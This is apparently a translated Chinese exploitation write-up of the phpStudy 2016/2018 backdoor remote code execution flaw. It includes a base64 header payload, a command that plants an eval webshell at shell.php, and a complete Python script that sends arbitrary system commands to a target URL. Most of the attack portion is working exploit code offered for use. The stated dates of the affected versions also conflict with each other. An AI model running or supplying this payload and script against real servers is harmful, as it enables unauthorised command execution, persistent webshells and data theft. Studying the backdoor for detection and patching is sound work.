Vulnerability description
PHPStudyRCE (Remote Code Execution), also known as phpstudy_backdoor vulnerability, refers to a remote code execution vulnerability in PHPStudy software.
Vulnerability scope
Phpstudy software is a free PHP debugging environment program integration package in China. It can be installed at one time by integrating Apache, PHP, MySQL, phpMyAdmin and other software. It can be installed and used directly without configuration, and it can be built with one click. Among them, the 2016 and 2018 versions of phpstudy have RCE vulnerabilities formed after being maliciously tampered by hackers. This vulnerability can directly execute system commands remotely.
The exact impact of a vulnerability depends on how an attacker exploits the vulnerability. By exploiting this vulnerability, an attacker could execute arbitrary PHP code and take complete control of the affected system. Attackers can execute malicious code, access and modify sensitive data, plant backdoors, and more.
It should be noted that the vulnerability only affects systems using a specific version of the PHPStudy software, specifically versions released between January 2018 and May 2019. In the fix version released in May 2019, the vulnerability was fixed by the developer.
illustrate | content |
---|---|
Vulnerability number | phpstudy-2016,2018-RCE |
Vulnerability name | RCE(Remote Command|Code Execute) |
Vulnerability Rating | high risk |
Sphere of influence | phpStudy 2016-----phpStudy 2018 |
Vulnerability description | Attackers can exploit this vulnerability to execute PHP commands, also known as the phpStudy backdoor. |
Vulnerability environment
Link: https://pan.baidu.com/s/1_kieJmU7Azq-lMKIp9VmaA
Extraction code: 2hf6
Vulnerability recurrence
The specific version and server platform are not listed, please refer to the information of phpinfo
Use burp to capture packets and then resend the packets
exploit
Triggering conditions
Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
Accept-Encoding: gzip,deflate
tips: pay attention to spaces here
Use the burp encoder to construct a system execution command and use base64 encoding
get
c3lzdGVtKCdpcGNvbmZpZycpOw==
After modifying the data packet, replay it, and the source code on the right finds that ipconfig has been executed
exploit
The function of this code is to <?php@eval($_POST[cmd]);
write the string to the "C:/phpStudy/WWW/shell.php" file. This PHP code will execute $_POST[cmd]
the command in the variable and execute the result. This is a common phrase used to write webshells, please note that using such code is very dangerous as it allows arbitrary command execution and manipulation of the server filesystem. This code can be easily misused, for example to execute malicious commands, destroy or steal data.
system(' echo ^<?php@eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/shell.php ');
POC
POC is the abbreviation of "Proof of Concept". In the field of computer security, POC usually refers to a specific demonstration or proof code implemented by attackers or security researchers to verify the existence, utilization effect or attack method of a certain vulnerability.
Next, I will show it to you. In order to better experience the effect, I will demonstrate it in powershell
When I run this rce script, the interface below is displayed, and the usage of the tool is prompted.
When I add the website and run the script, I will be prompted to enter the command I want to execute, and then press Enter to execute the host of the remote PhpStudy server
Below is the source code
import requests
import base64
import sys
banner = '''
.---. .-. .--. .-. .-. .---. .--. .--.
: .; :: : : .--'.' `. : : : .; :: .--': .--'
: _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-. : .': : : `;
: : : .. :: .; ` _`, : : : : :; :' .; :: :; : : :.`.: :__ : :__
:_; :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ; :_;:_;`.__.'`.__.'
: : .-. :
:_; `._.'
python *.py http://192.168.21.155/phpinfo.php
'''
if len(sys.argv) < 2:
print(banner)
exit()
url = sys.argv[1]
def attack(cmd):
cmd = f"system('{cmd}');"
cmd = base64.b64encode(cmd.encode())
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
res = requests.get(url = url,headers = headers)
rs = res.content.decode("gb2312")
result = rs[0:rs.find("DOCTYPE html")]
return result
if __name__ == '__main__':
cmd = input("请输入想要执行的系统命令:")
if cmd == 'q':
print("感谢使用!!!")
else:
print(attack(cmd))